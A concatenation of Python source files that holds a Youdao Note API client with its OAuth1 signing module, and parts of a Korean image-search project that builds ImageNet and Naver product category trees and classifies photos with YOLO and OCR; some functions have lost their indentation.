            return "<img path=\"%s\" src=\"%s\" />" % (self.url,self.icon)
        return "<img src=\"%s\" />" % self.url
class YNoteError(StandardError):
    '''
    SDK error class that represents API error as well as http error.
    (StandardError is Python 2 only.)
    '''
    def __init__(self, error_type, error_code, message):
        '''init with error type ('API_ERROR'/'HTTP_ERROR'), code and message.'''
        self.error_msg = message
        self.error_code = int(error_code)
        self.error_type = error_type
        StandardError.__init__(self, message)
    def __str__(self):
        '''convert to a string.'''
        return "YNoteError: type=%s, code=%d, message=%s" % (self.error_type, self.error_code, self.error_msg)
def _parse_api_error(body):
    '''parse a YNote API error response body into a YNoteError object'''
    payload = json.loads(body)
    code = int(payload['error'])
    return YNoteError('API_ERROR', code, payload['message'])
def _parse_http_error(e):
    '''parse an urllib2.HTTPError object to YNoteError object'''
    # HTTP 500 responses are routed to _parse_api_error by _do_http instead
    return YNoteError('HTTP_ERROR', e.code, e.reason)
def _parse_urlencoded(body):
'''parse an urlencoded string to dictionary'''
parts = body.split('&')
return dict([tuple(part.split('=')) for part in parts])
def _do_http(request):
    '''initiate an http request; return the response body or raise YNoteError.'''
    try:
        resp = urllib2.urlopen(request)
        return resp.read()
    except urllib2.HTTPError, e:
        # the API reports application-level errors as HTTP 500 with a JSON body
        if e.code == 500:
            raise _parse_api_error(e.read())
        else:
            raise _parse_http_error(e)
def _do_get(url, params, consumer, token):
    '''
    initiate an OAuth-signed http GET request,
    return result as a string or raise error.
    '''
    req_builder = oauth2.RequestBuilder(oauth2.HTTP_GET, url, params)
    req = req_builder.build_signed_request(consumer, token)
    return _do_http(req)
def _do_post(url, params, consumer, token):
    '''
    initiate an http POST request with urlencoded content,
    return result as string or raise error.
    '''
    # plain alias for the urlencoded variant
    return _do_post_urlencoded(url, params, consumer, token)
def _do_post_urlencoded(url, params, consumer, token):
    '''
    initiate an OAuth-signed http POST request with urlencoded content,
    return result as string or raise error.
    '''
    req_builder = oauth2.RequestBuilder(oauth2.HTTP_POST_URLENCODED, url, params)
    req = req_builder.build_signed_request(consumer, token)
    return _do_http(req)
def _do_post_multipart(url, params, consumer, token):
    '''
    initiate an OAuth-signed http POST request with multipart content
    (used for note bodies and file uploads),
    return result as string or raise error.
    '''
    req_builder = oauth2.RequestBuilder(oauth2.HTTP_POST_MULTIPART, url, params)
    req = req_builder.build_signed_request(consumer, token)
    return _do_http(req)
class YNoteClient:
    """API client for Youdao Note (sandbox host, OAuth-signed requests)."""
    def __init__(self, consumer_key, consumer_secret):
        '''init with consumer key and consumer secret.'''
        self.consumer = oauth2.Consumer(consumer_key, consumer_secret)
        self.access_token = None
        self.request_token = None
    def grant_request_token(self, callback_url):
        '''get request token(store in self.request_token), return authorization url.'''
        if callback_url:
            params = {'oauth_callback':callback_url}
        else:
            # 'oob' = out-of-band: the user copies the verifier back manually
            params = {'oauth_callback':'oob'}
        res = _do_get(BASE_URL+'oauth/request_token', params, self.consumer, None)
        res_dict = _parse_urlencoded(res)
        self.request_token = oauth2.Token(res_dict['oauth_token'], res_dict['oauth_token_secret'])
        auth_url = BASE_URL + 'oauth/authorize?oauth_token=' + self.request_token.key
        if callback_url:
            auth_url += '&oauth_callback=' + callback_url
        return auth_url
    def grant_access_token(self, verifier):
        '''exchange the request token + verifier for an access token (stored in self.access_token).'''
        params = {
            'oauth_token':self.request_token.key,
            'oauth_verifier':verifier
        }
        res = _do_get(BASE_URL+'oauth/access_token', params, self.consumer, self.request_token)
        res_dict = _parse_urlencoded(res)
        self.access_token = oauth2.Token(res_dict['oauth_token'], res_dict['oauth_token_secret'])
    def set_access_token(self, token_key, token_secret):
        '''set the access token'''
        self.access_token = oauth2.Token(token_key, token_secret)
    def get_access_token(self):
        '''get current access token as key,secret ("" pair when not granted)'''
        if self.access_token:
            return self.access_token.key, self.access_token.secret
        else:
            return "", ""
    def get_user(self):
        '''get user information, return as a User object.'''
        res = _do_get(BASE_URL+'yws/open/user/get.json', None, self.consumer, self.access_token)
        return User(json.loads(res))
    def get_notebooks(self):
        '''get all notebooks, return as a list of Notebook objects.'''
        res = _do_post(BASE_URL+'yws/open/notebook/all.json', None, self.consumer, self.access_token)
        return [Notebook(d) for d in json.loads(res)]
    def get_note_paths(self, book_path):
        '''get path of all notes in a notebook, return as a list of path strings.'''
        params = {'notebook':book_path}
        res = _do_post(BASE_URL+'yws/open/notebook/list.json', params, self.consumer, self.access_token)
        return json.loads(res)
    def create_notebook(self, name, create_time=None):
        '''create a notebook with specified name; return its path.'''
        params = {'name':name}
        if create_time:
            params['create_time'] = create_time
        res = _do_post(BASE_URL+'yws/open/notebook/create.json', params, self.consumer, self.access_token)
        return json.loads(res)['path']
    def delete_notebook(self, path):
        '''delete a notebook with specified path.'''
        params = {'notebook':path}
        # response body is ignored; failures surface as YNoteError from _do_http
        res = _do_post(BASE_URL+'yws/open/notebook/delete.json', params, self.consumer, self.access_token)
    def get_note(self, path):
        '''get a note with specified path, return as a Note object.'''
        params = {'path':path}
        res = _do_post(BASE_URL+'yws/open/note/get.json', params, self.consumer, self.access_token)
        return Note(json.loads(res))
    def create_note(self, book_path, note):
        '''create a note in a notebook with information specified in "note"; return its path.'''
        params = {
            'source':note.source,
            'author':note.author,
            'title':note.title,
            'content':note.content,
            'notebook':book_path
        }
        res = _do_post_multipart(BASE_URL+'yws/open/note/create.json', params, self.consumer, self.access_token)
        return json.loads(res)['path']
    def create_note_with_attributes(self, book_path, content, **kw):
        '''create a note with attributes given by keyword parameters
        (source/author/title/create_time are all optional); return its path.'''
        params = { 'notebook':book_path, 'content':content }
        if 'source' in kw.keys():
            params['source'] = kw['source']
        if 'author' in kw.keys():
            params['author'] = kw['author']
        if 'title' in kw.keys():
            params['title'] = kw['title']
        if 'create_time' in kw.keys():
            params['create_time'] = kw['create_time']
        res = _do_post_multipart(BASE_URL+'yws/open/note/create.json', params, self.consumer, self.access_token)
        return json.loads(res)['path']
    def update_note(self, note, modify_time=None):
        '''update the note with information in "note".'''
        params = {
            'path':note.path,
            'source':note.source,
            'author':note.author,
            'title':note.title,
            'content':note.content,
        }
        if modify_time:
            params['modify_time'] = modify_time
        _do_post_multipart(BASE_URL+'yws/open/note/update.json', params, self.consumer, self.access_token)
    def update_note_attributes(self, note_path, **kw):
        '''update some attributes (given by keyword parameters) of the note.'''
        params = {'path':note_path}
        if 'source' in kw.keys():
            params['source'] = kw['source']
        if 'author' in kw.keys():
            params['author'] = kw['author']
        if 'title' in kw.keys():
            params['title'] = kw['title']
        if 'content' in kw.keys():
            params['content'] = kw['content']
        if 'modify_time' in kw.keys():
            params['modify_time'] = kw['modify_time']
        _do_post_multipart(BASE_URL+'yws/open/note/update.json', params, self.consumer, self.access_token)
    def move_note(self, note_path, book_path):
        '''move note to the notebook with path denoted by "book_path"; return the new note path.'''
        params = {
            'path':note_path,
            'notebook':book_path
        }
        res = _do_post(BASE_URL+'yws/open/note/move.json', params, self.consumer, self.access_token)
        return json.loads(res)['path']
    def delete_note(self, note_path):
        '''delete a note with specified path.'''
        params = {'path':note_path}
        # response body is ignored; failures surface as YNoteError from _do_http
        res = _do_post(BASE_URL+'yws/open/note/delete.json', params, self.consumer, self.access_token)
    def share_note(self, note_path):
        '''share a note with specified path, return shared url.'''
        params = {'path':note_path}
        res = _do_post(BASE_URL+'yws/open/share/publish.json', params, self.consumer, self.access_token)
        return _fix_url(json.loads(res)['url'])
    def upload_resource(self, res_file):
        '''upload an open file object as a resource; return a Resource object.'''
        params = {'file':res_file}
        res = _do_post_multipart(BASE_URL+'yws/open/resource/upload.json', params, self.consumer, self.access_token)
        return Resource(json.loads(res))
    def download_resource(self, resource_url):
        '''download a resource file with specified url, return as a string.'''
        res = _do_get(resource_url, None, self.consumer, self.access_token)
        return res
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__version__ = "1.0b"
__author__ = "Li Chuan (daniellee0219@gmail.com)"
'''
OAuth2 module for Youdao Note client SDK.
'''
import binascii
import time
import random
import urllib
import urllib2
import hmac
import collections
def _escape(s):
    """Percent-encode for OAuth, keeping '~' unescaped (Python 2 urllib.quote)."""
    return urllib.quote(s, safe='~')
def _generate_timestamp():
"""Get seconds since epoch (UTC)."""
return int(time.time())
def _generate_nonce(length=15):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def _encode_urlencoded(params):
    '''build an application/x-www-form-urlencoded body (Python 2 str/unicode handling).'''
    args = []
    for k, v in params.iteritems():
        if isinstance(v, basestring):
            # unicode values are encoded to UTF-8 bytes before escaping
            qv = v.encode('utf-8') if isinstance(v, unicode) else v
            args.append('%s=%s' % (k, _escape(qv)))
        elif isinstance(v, collections.Iterable):
            # iterable values expand to repeated k=v pairs
            for i in v:
                qv = i.encode('utf-8') if isinstance(i, unicode) else str(i)
                args.append('%s=%s' % (k, _escape(qv)))
        else:
            qv = str(v)
            args.append('%s=%s' % (k, _escape(qv)))
    return '&'.join(args)
def _encode_multipart(params):
    '''build a multipart/form-data body with a time-derived boundary;
    returns (body, boundary).'''
    boundary = '----------%s' % hex(int(time.time() * 1000))
    data = []
    for k, v in params.iteritems():
        data.append('--%s' % boundary)
        if hasattr(v, 'read'):
            # file-like object: inline its content as a file part
            filename = getattr(v, 'name', '')
            data.append('Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (k, filename))
            data.append(v.read() if v else "")
        else:
            data.append('Content-Disposition: form-data; name="%s"\r\n' % k)
            if v:
                # unicode values are encoded to UTF-8 bytes
                data.append(v.encode('utf-8') if isinstance(v, unicode) else v)
            else:
                data.append("")
    data.append('--%s--\r\n' % boundary)
    return '\r\n'.join(data), boundary
class Consumer:
    '''OAuth consumer: the application's key/secret pair.'''
    def __init__(self, key, secret):
        self.key, self.secret = key, secret
class Token:
    '''OAuth token: a granted request/access token key/secret pair.'''
    def __init__(self, key, secret):
        self.key, self.secret = key, secret
# Request types: indices into the method table used by _get_method
HTTP_GET = 0
HTTP_POST_URLENCODED = 1
HTTP_POST_MULTIPART = 2
def _get_method(request_type):
'''get method name for request type.'''
try:
return ['GET', 'POST', 'POST'][request_type]
except:
return ''
class RequestBuilder(dict):
    '''OAuth request builder: a dict of request parameters plus the request
    type and target url; produces a signed urllib2.Request.'''
    def __init__(self, request_type, url, extra_params=None):
        '''init request builder'''
        self.request_type = request_type
        self.url = url
        if extra_params is not None:
            self.update(extra_params)
    def _sign(self, consumer, token):
        '''fill request with OAuth fields including signature.'''
        self['oauth_consumer_key'] = consumer.key
        if token:
            self['oauth_token'] = token.key
        self['oauth_timestamp'] = _generate_timestamp()
        self['oauth_nonce'] = _generate_nonce()
        self['oauth_version'] = '1.0'
        self['oauth_signature_method'] = SignatureMethod_HMAC_SHA1.name
        # the signature is computed after all other oauth_* fields are set
        signature = SignatureMethod_HMAC_SHA1.sign(self, consumer, token)
        self['oauth_signature'] = signature
    def get_normalized_parameters(self):
        '''
        build a string that contains the parameters that must be signed.
        '''
        # urlencoded POSTs sign the body parameters too; other request types
        # sign only the oauth_* fields
        if self.request_type == HTTP_POST_URLENCODED:
            items = [(k, v) for k, v in self.items() if k != 'oauth_signature']
        else:
            items = [(k, v) for k, v in self.items() if k.startswith('oauth_') and k != 'oauth_signature']
        # sorted() fixes the signing order; doseq=True expands sequence values
        encoded_str = urllib.urlencode(sorted(items), True)
        # OAuth requires %20, not '+', for spaces
        return encoded_str.replace('+', '%20')
    def _get_auth_header(self):
        '''Get the value of the "Authorization" header'''
        oauth_params = ((k, v) for k, v in self.items()
                        if k.startswith('oauth_'))
        stringy_params = ((k, _escape(str(v))) for k, v in oauth_params)
        header_params = ('%s="%s"' % (k, v) for k, v in stringy_params)
        params_header = ', '.join(header_params)
        auth_header = 'OAuth'
        if params_header:
            auth_header = "%s %s" % (auth_header, params_header)
        return auth_header
    def _get_urlencoded_body(self):
        '''get body for urlencoded post requests (non-oauth params only)'''
        body_params = dict([(k, v) for k, v in self.items()
                            if not k.startswith('oauth_')])
        if not body_params:
            return ''
        return _encode_urlencoded(body_params)
    def _get_multipart_body_boundary(self):
        '''get (body, boundary) for multipart post requests'''
        body_params = dict([(k,v) for k,v in self.items()
                            if not k.startswith('oauth_')])
        # NOTE(review): returns a bare '' (not a tuple) when there are no body
        # params, which would break the `body, boundary = ...` unpacking in
        # build_signed_request — confirm multipart requests always carry params.
        if not body_params:
            return ''
        return _encode_multipart(body_params)
    def build_signed_request(self, consumer, token):
        '''
        build a request signed by consumer and token, return request as instance of urllib2.Request.
        '''
        self._sign(consumer, token)
        if self.request_type == HTTP_GET:
            req = urllib2.Request(self.url, None)
        elif self.request_type == HTTP_POST_URLENCODED:
            body = self._get_urlencoded_body()
            req = urllib2.Request(self.url, body)
            req.add_header('Content-Type', 'application/x-www-form-urlencoded')
        else:
            body, boundary = self._get_multipart_body_boundary()
            req = urllib2.Request(self.url, body)
            req.add_header('Content-Type', 'multipart/form-data; boundary=%s; charset=UTF-8' % boundary)
        # all oauth_* fields travel in the Authorization header
        req.add_header('Authorization', self._get_auth_header())
        return req
class SignatureMethod_HMAC_SHA1:
    '''HMAC-SHA1 signature method — the only one this SDK implements.'''
    name = 'HMAC-SHA1'
    @classmethod
    def _signing_base(cls, request, consumer, token):
        '''build key and base string for request builder.'''
        # base string: METHOD&url&normalized-params, each component escaped
        sig = (
            _escape(_get_method(request.request_type)),
            _escape(request.url),
            _escape(request.get_normalized_parameters()),
        )
        # key: consumer secret + '&' + token secret (trailing '&' when no token)
        key = '%s&' % _escape(consumer.secret)
        if token:
            key += _escape(token.secret)
        base_string = '&'.join(sig)
        return key, base_string
    @classmethod
    def sign(cls, request, consumer, token):
        """calculate the signature for the request builder."""
        key, base_string = cls._signing_base(request, consumer, token)
        # HMAC object.
        try:
            import hashlib # 2.5
            hashed = hmac.new(key, base_string, hashlib.sha1)
        except ImportError:
            import sha # Deprecated
            hashed = hmac.new(key, base_string, sha)
        # Calculate the digest base 64 ([:-1] strips the trailing newline).
        return binascii.b2a_base64(hashed.digest())[:-1]
|
[
"/demo.py",
"/setup.py",
"/ynote/__init__.py",
"/ynote/oauth2.py"
] |
0319easy/SearchPicture
|
'''
filePathGetter
파일 경로 리턴해주는 static 클래스
파일
1. 네이버상품트리 파일
2. 이미지넷 계층트리 파일
3. 이미지가 있는 디렉토리
4. 트레이닝 이미지가 있는 디렉토리
5. 데이터베이스 파일
'''
import os
class FilePathGetter:
    """Static helper centralizing every file/directory path the app uses.

    Paths provided:
      1. Naver goods tree file
      2. ImageNet hierarchy tree file
      3. image directory
      4. training-image directory
      5. database name
    """
    @staticmethod
    def getNaverGoodsTreeFilePath():
        return "NaverGoodsTree.txt"
    @staticmethod
    def getImageNetTreeFilePath():
        return "ImageNetTree.txt"
    @staticmethod
    def getImageDirPath():
        # os.path.join instead of a hard-coded backslash: the original
        # f'{...}\image' only produced a valid path on Windows and relied on
        # the invalid escape sequence '\i'
        return os.path.join(os.path.abspath(os.getcwd()), 'image')
    @staticmethod
    def getTrainingImageDirPath():
        return "training_img"
    @staticmethod
    def getDBName():
        return "photo_data"
--- FILE SEPARATOR ---
from anytree import Node, RenderTree
import HierarchyTree.ImagenetClassFilter as ImagenetClassFilter
import HierarchyTree.NaverGoodsTreeConverter as NaverGoodsTreeConverter
#import ImagenetClassFilter
#import NaverGoodsTreeConverter
'''
HierarchyTree
계층트리 클래스
기능
1. 트리 생성
2. 키워드로 노드 검색 후 연결된 노드들 리턴(부모 노드들, 자신, 자식 노드들)
3. 트리 전체 출력
'''
# TODO : ImageNet Tree 붙여서 구성하기
class HierarchyTree:
    """Category hierarchy tree.

    Builds an anytree hierarchy from a "parent child" text file, then prunes
    leaves that are not covered by the training data set, and supports
    keyword search returning the related (ancestor + subtree) node labels.
    """

    def __init__(self, hierarchyTree, trainingLabel, wnid2name):
        # Path of the parent-child tree file to load.
        self.hierarchyTreeFile = hierarchyTree
        # All created Node objects, in creation order.
        self.node_set = []
        # Maps node label (its `data` string) -> index into node_set.
        self.content = {}
        self.icFilter = ImagenetClassFilter.ImagenetClassFilter(trainingLabel, wnid2name)
        self.ngtConverter = NaverGoodsTreeConverter.NaverGoodsTreeConverter()

    def makeHierarchyTree(self):
        """Load the tree file, build the node graph, then prune untrained leaves."""
        self.icFilter.makeTrainingLabelSet()
        self.icFilter.makeWnid2NameMap()
        f = open(self.hierarchyTreeFile, 'r', encoding='UTF-8')
        # Seed the tree: a synthetic root whose two children are the ImageNet
        # "entity" root and the goods ("상품") root.
        self.node_set.append(Node(0, data="root/"))
        self.node_set.append(Node(1, data="n00001740/entity/", parent=self.node_set[0]))
        self.node_set.append(Node(2, data="상품/", parent=self.node_set[0]))
        self.content["root/"] = 0
        self.content["n00001740/entity/"] = 1
        self.content["상품/"] = 2
        while True:
            dat = f.readline()
            if not dat: break
            dat = dat.replace("\n", "", 1)
            # Each line is "<parent> <child>".
            parent = dat.split()[0]
            child = dat.split()[1]
            # Skip pairs whose wnids are unknown to the wnid->name map.
            if not self.checkIfKeyExists((parent, child)):
                continue
            parent = self.getData(parent)
            child = self.getData(child)
            if parent not in self.content.keys():
                self.content[parent] = len(self.node_set)
                self.node_set.append(Node(len(self.node_set), data=parent))
            if child in self.content.keys():
                # Child already exists: just re-parent it.
                self.node_set[self.content[child]].parent = self.node_set[self.content[parent]]
                continue
            self.content[child] = len(self.node_set)
            self.node_set.append(Node(len(self.node_set), data=child, parent=self.node_set[self.content[parent]]))
        f.close()
        # self.showTree()
        # Prune leaves missing from the training set, then walk upward removing
        # ancestors that became childless and are untrained themselves.
        for row in RenderTree(self.node_set[0]):
            pre, fill, node = row
            if node.is_leaf:
                if self.is_in_training_dataset(node.data):
                    continue
                else:
                    parent_node = node.parent
                    node.parent = None
                    del node
                    # NOTE(review): if pruning ever reached the root,
                    # parent_node would become None and the loop condition
                    # would raise — presumably the data never prunes that far;
                    # verify. (Currently unreachable: is_in_training_dataset
                    # is stubbed to True, so no pruning happens at all.)
                    while(len(parent_node.children) == 0 and not self.is_in_training_dataset(parent_node.data)):
                        tmp_node = parent_node.parent
                        parent_node.parent = None
                        del parent_node
                        parent_node = tmp_node

    def is_in_training_dataset(self, keyword):
        # Stubbed to always True, which makes the pruning pass above a no-op.
        return True
        # if keyword[0] != "n" or self.icFilter.is_name_in_trainingLabel(keyword):
        #     return True
        # else:
        #     return False

    def getData(self, wnid):
        """Return "<wnid>/<name>/" for an ImageNet wnid; other labels unchanged."""
        if wnid[0] != "n":
            return wnid
        return wnid + "/" + self.icFilter.getData(wnid) + "/"

    def checkIfKeyExists(self, key):
        """True when both wnids of the (parent, child) pair are known (or not wnids)."""
        if key[0][0] != "n":
            return True
        if self.icFilter.check_wnid_in_wnid2key(key[0]) and self.icFilter.check_wnid_in_wnid2key(key[1]):
            return True
        else:
            return False

    def searchKeyword(self, keyword):
        """Return labels related to the first node whose data contains "/keyword/".

        Returns None when no node matches.
        """
        for row in RenderTree(self.node_set[0]):
            pre, fill, node = row
            if "/" + keyword + "/" in node.data:
                return self.getRelatedNodes(node)

    def getRelatedNodes(self, node):
        """Ancestor labels plus this node's subtree labels (see getChildren)."""
        result = []
        result += self.getParents(node)
        result += self.getChildren(node)
        return result

    def getChildren(self, node):
        # NOTE(review): the immediate break makes this return only the node's
        # own label (RenderTree yields the subtree root first) — confirm that
        # is intended rather than the full descendant list.
        children = []
        for row in RenderTree(node):
            pre, fill, node = row
            children.append(node.data)
            break
        return children

    def getParents(self, node):
        """Labels of all ancestors of *node*, nearest first."""
        parents = []
        while True:
            if node.parent:
                parents.append(node.parent.data)
                node = node.parent
            else:
                break
        return parents

    def showTree(self):
        """Pretty-print the whole tree to stdout."""
        print("==" * 20)
        print("==" * 8 + "트리정보" + "==" * 8)
        print("==" * 20)
        for row in RenderTree(self.node_set[0]):
            pre, fill, node = row
            print(f"{pre}{node.name}, data: {node.data}")
        print("==" * 20)

    def showTreeP2Cformat(self):
        """Dump the tree to NaverGoodsTreeP2C.txt as "parent child" lines."""
        with open("NaverGoodsTreeP2C.txt", "w", encoding="UTF-8") as f:
            for row in RenderTree(self.node_set[0]):
                pre, fill, node = row
                if node.data == "상품":
                    continue
                f.write(f"{node.parent.data} {node.data}\n")
if __name__ == "__main__":
    # Manual smoke test: build the tree from the local data files and print it.
    ht = HierarchyTree("HierarchyTree.dat", "Imagenet.txt", "wnid2name.txt")
    ht.makeHierarchyTree()
    # print(f'keyword : 옷의류 result : {ht.searchKeyword("패션의류")}')
    # print(f'keyword : 러닝 result : {ht.searchKeyword("러닝")}')
    # print(f'keyword : 신발 result : {ht.searchKeyword("신발")}')
    # print(f'keyword : cat result : {ht.searchKeyword("cat")}')
    ht.showTree()
--- FILE SEPARATOR ---
import sqlite3
import re
from anytree import Node, RenderTree
class ImagenetClassFilter:
    """Filters ImageNet classes against the training label set.

    Reads two text files:
      * training_label: lines containing a quoted class-name list
      * wnid2name: lines of "<wnid> <names>" mapping wnids to readable names
    Names are normalized to "a/b/c" form (", " separators become "/").
    """

    def __init__(self, training_label, wnid2name):
        self.trainingLabelFilePath = training_label
        self.wnid2nameFilePath = wnid2name
        self.trainingLabel = []   # normalized training class names
        self.wnid2name = {}       # wnid -> normalized readable name

    def makeTrainingLabelSet(self):
        """(Re)build self.trainingLabel from the training label file."""
        self.trainingLabel = []
        with open(self.trainingLabelFilePath, "r") as training_f:
            while True:
                line = training_f.readline()
                if not line:
                    break
                # The label is quoted with either " or '; pick the matching pattern.
                if line[-3] == "\"":
                    pattern = re.compile(r"\".*\"")
                else:
                    pattern = re.compile(r"\'.*\'")
                m = pattern.search(line.replace("\n", ""))
                # Strip the quotes, turn ", " separators into "/", append "/".
                # Fixed: the original passed len(str(m.group)) — the repr
                # length of the *bound method* — as the replace count; a
                # plain replace-all is what was meant (same result, on purpose).
                self.trainingLabel.append(str(m.group()).replace(", ", "/")[1:-1] + "/")

    def writeTrainingLabels2File(self):
        """Write "<wnid> <name>" lines for wnids whose name is in the training set."""
        with open("training_label.dat", "w") as f:
            for wnid, name in self.wnid2name.items():
                if self.changeFormat(name) in self.trainingLabel:
                    f.write(wnid)
                    f.write(" ")
                    f.write(self.changeFormat(name))
                    f.write("\n")

    def makeWnid2NameMap(self):
        """(Re)build self.wnid2name from the wnid2name file."""
        with open(self.wnid2nameFilePath, "r") as f:
            while True:
                line = f.readline()
                if not line:
                    break
                # Line layout: "<9-char wnid> <comma-separated names>".
                self.wnid2name[line[:self.getLenWnid()]] = self.changeFormat(line[self.getLenWnid() + 1:])

    def changeFormat(self, name):
        """Normalize a name: ", " separators -> "/", strip newlines."""
        return name.replace(", ", "/").replace("\n", "")

    def check_wnid_in_wnid2key(self, wnid):
        """True if *wnid* is not a wnid at all, or is present in the map."""
        return wnid[0] != "n" or wnid in self.wnid2name

    def is_name_in_trainingLabel(self, name):
        # Stubbed to always True (training-set filtering disabled for now).
        return True
        # if name[0] != "n" or name[self.getLenWnid()+1 : ] in self.trainingLabel:
        #     return True
        # else:
        #     return False

    def is_wnid_in_trainingLabel(self, wnid):
        # Stubbed to always True (training-set filtering disabled for now).
        return True
        # if wnid[0] != "n" or wnid[:self.getLenWnid()] in self.trainingLabel:
        #     return True
        # else:
        #     return False

    def getData(self, wnid):
        """Return the readable name mapped to *wnid*, or None if unknown."""
        return self.wnid2name.get(wnid)

    def getLenWnid(self):
        """Length of a wnid string such as "n00000000"."""
        return len("n00000000")
if __name__ == "__main__":
    # Manual smoke test: build both maps from the local files, print the
    # training labels, and exercise the lookup helpers.
    icFilter = ImagenetClassFilter("Imagenet.txt", "wnid2name.txt")
    icFilter.makeTrainingLabelSet()
    icFilter.makeWnid2NameMap()
    for val in icFilter.trainingLabel:
        print(val)
    # for key, val in icFilter.wnid2name.items():
    #     print(key," ", val)
    print(icFilter.is_name_in_trainingLabel("junco/snowbird"))
    print(icFilter.getData("n02404186"))
    icFilter.writeTrainingLabels2File()
--- FILE SEPARATOR ---
import re
from anytree import Node, RenderTree
'''
NaverGoodsTreeConverter
기능
tab으로 이루어진 트리를 parent child 포맷으로 출력시켜준다.
makeContent()
makeTree()
하면 트리가 만들어진다.
showTree()
하면 트리 출력
showTreeP2Cformat()
하면 parent child 포맷으로 출력
'''
class NaverGoodsTreeConverter:
    """Converts a tab-indented category tree file into an anytree tree.

    makeTree() builds the tree (it loads the file itself via makeContent());
    showTree() pretty-prints it; showTreeP2Cformat() writes it back out as
    "parent child" lines.
    """

    def __init__(self):
        self.naverGoodsPath = "NaverGoodsTree.txt"   # input: tab-indented tree
        self.targetPath = "NaverGoodsTreeP2C.txt"    # output: parent-child lines
        self.node_set = []   # created nodes, in file order
        self.content = []    # (tab-depth, label) per input line

    def makeContent(self):
        """Append (tab-depth, label) pairs for every line of the input file."""
        f = open(self.naverGoodsPath, 'r', encoding='UTF8')
        while True:
            line = f.readline()
            if not line: break
            self.content.append((line.count("\t"), line.replace("\n", "").replace("\t", "", len(line))))
        f.close()

    def makeTree(self):
        """Load the file and build the anytree structure from it."""
        self.makeContent()
        self.node_set.append(Node(f'node_{0}', data=self.content[0][1]))
        self.makeTree_sub(0)

    def makeTree_sub(self, nodeNum):
        # Recursive descent over self.content. node_set doubles as the cursor:
        # the next unplaced line is always self.content[len(self.node_set)].
        while True:
            if (len(self.content) == len(self.node_set)) or (
                    self.content[nodeNum][0] > self.content[len(self.node_set)][0] - 1):
                # All lines consumed, or the next line is shallower: unwind.
                return
            elif self.content[nodeNum][0] == self.content[len(self.node_set)][0] - 1:
                # Next line is exactly one level deeper: it is our child.
                self.node_set.append(Node(f'node_{len(self.node_set)}', parent=self.node_set[nodeNum],
                                          data=self.content[len(self.node_set)][1]))
            elif self.content[nodeNum][0] < self.content[len(self.node_set)][0] - 1:
                # Next line is deeper still: recurse into the last-added node.
                self.makeTree_sub(len(self.node_set) - 1)

    def showTree(self):
        """Pretty-print the tree to stdout."""
        print("==" * 20)
        print("==" * 8 + "트리정보" + "==" * 8)
        print("==" * 20)
        for row in RenderTree(self.node_set[0]):
            pre, fill, node = row
            print(f"{pre}{node.name}, data: {node.data}")
        print("==" * 20)

    def showTreeP2Cformat(self):
        """Write the tree as "parent child" lines to self.targetPath."""
        with open(self.targetPath, "w", encoding="UTF-8") as f:
            for row in RenderTree(self.node_set[0]):
                pre, fill, node = row
                if node.data == "상품":
                    continue
                f.write(f"{node.parent.data} {node.data}\n")
if __name__ == "__main__":
    # Build and display the tree. Fixed: makeTree() already loads the file
    # via makeContent(); the original called makeContent() explicitly first,
    # appending every line to self.content twice and corrupting the tree.
    ngtc = NaverGoodsTreeConverter()
    ngtc.makeTree()
    ngtc.showTree()
--- FILE SEPARATOR ---
import cv2
#from HierarchyTree import HierarchyTree
import Launcher
from HierarchyTree import HierarchyTree
from Yolo import Yolo
import ImageGetter as GI
import text.TesseractOCR as TesseractOCR
import threading
import Logger
from Yolo.Yolo_cmd import Yolo_cmd
'''
ImageClassifier
이미지 분류기
기능
1. 특정 directory 안에 있는 이미지 읽어오기
2. 이미지 classify
'''
#TODO : 1. OCR 적용 2. batch 적용
class ImageClassifier():
    """Classifies the images of one user.

    Wires together the image lister, the Tesseract OCR wrapper, the YOLO
    object detector, and the category hierarchy tree, and pushes per-image
    tags / recognized text into the given Logger (sqlite database).
    """

    def __init__(self, user_id, logger):
        # NOTE(review): the class does not inherit threading.Thread, yet calls
        # its __init__ — presumably a leftover from an earlier design; confirm.
        threading.Thread.__init__(self)
        self.imageGetter = GI.ImageGetter(user_id)
        # Only images not yet present in the database.
        self.fileList = self.imageGetter.getFileList(logger)
        self.textAnalyzer = TesseractOCR.TesseractOCR()
        # self.objClassifier = Yolo.Yolo('Yolo\darknet\yolo9000\yolo9000.weights', 'Yolo\darknet\yolo9000\yolo9000_2.cfg','Yolo\darknet\yolo9000\9k.names')
        self.objClassifier = Yolo.Yolo('..\Yolo\yolov3.weights', '..\Yolo\yolov3.cfg', '..\Yolo\yolov3.txt')
        self.hierarchyTree = HierarchyTree.HierarchyTree("..\HierarchyTree\HierarchyTree.dat", "..\HierarchyTree/Imagenet.txt", "..\HierarchyTree/wnid2name.txt")
        self.hierarchyTree.makeHierarchyTree()
        # External yolo9000 process wrapper (hard-coded developer-machine paths).
        self.Yolo_sub = Yolo_cmd('C:/Users\yjm6560\Desktop\yjm6560\CE\graduation_project\SearchPicture\Yolo\darknet\yolo9000\input.txt',
                                 'C:/Users\yjm6560\Desktop\yjm6560\CE\graduation_project\SearchPicture\Yolo\darknet/ret.txt')

    def readImages(self):
        """Load every file in self.fileList with cv2 and return the image list."""
        imageList = []
        for i in self.fileList:
            imageList.append(cv2.imread(i))
        if Launcher.DEBUG:
            print(f'read {len(imageList)} images')
        return imageList

    # TODO: only the YOLO batch path is wired up; revisit once OCR is batched too.
    def classifyObjImagesByBatch(self, logger, batch_size=8):
        """Run YOLO over the images in batches and log the related classes."""
        image_list = self.readImages()
        for i in range(int(len(self.fileList)/batch_size)+1):
            if i*batch_size == len(self.fileList):
                break
            elif (i+1)*batch_size > len(self.fileList):
                # Final, partial batch.
                ret = self.objClassifier.detectObj_in_Images(image_list[i*batch_size :], len(self.fileList)-(i*batch_size))
            else:
                ret = self.objClassifier.detectObj_in_Images(image_list[i*batch_size : (i+1)*batch_size], batch_size)
            for j in range(len(ret)):
                order = i*batch_size + j
                if Launcher.DEBUG:
                    print(f'{order} : {ret[j]}')
                    print(f'\t{self.getRelatedClasses(ret[j])}')
                logger.insertNonTextyPhoto(order, self.fileList[order], self.getRelatedClasses(ret[j]))

    def classifyObjImages_sub(self, logger, batch_size=8):
        """Detect objects via the external yolo9000 process and log the results."""
        img_path_f = open(self.Yolo_sub.img_list, "w+")
        for img_path in self.fileList:
            img_path_f.write(img_path + "\n")
        img_path_f.close()
